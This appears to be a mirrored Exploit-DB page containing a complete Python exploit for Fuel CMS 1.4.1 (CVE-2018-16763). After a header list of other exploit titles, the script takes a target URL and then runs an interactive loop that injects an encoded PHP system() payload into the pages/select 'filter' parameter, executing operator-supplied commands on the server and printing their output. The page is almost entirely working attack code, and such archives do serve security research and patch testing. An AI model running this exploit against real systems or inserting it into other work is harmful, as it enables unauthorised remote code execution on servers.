bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50477.py
Offensive Security 6829e7f3b7 DB: 2021-11-04 
17 changes to exploits/shellcodes

RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
Fuel CMS 1.4.1 - Remote Code Execution (3)
Eclipse Jetty 11.0.5 - Sensitive File Disclosure
WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
OpenAM 13.0 - LDAP Injection
Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
PHP Melody 3.0 - 'vid' SQL Injection
Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
2021-11-04 05:02:12 +00:00

63 lines
No EOL
1.8 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#!/usr/bin/python3
import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style
def get_arguments():
parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv) <=2:
parser.print_usage()
sys.exit()
return args
args = get_arguments()
url = args.url
if "http" not in url:
sys.stderr.write("Enter vaild url")
sys.exit()
try:
r = requests.get(url)
if r.status_code == 200:
print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
except requests.ConnectionError:
print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
sys.exit()
while True:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)
#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
print(output[0])
if cmd == "exit":
break
Reference in a new issue View git blame Copy permalink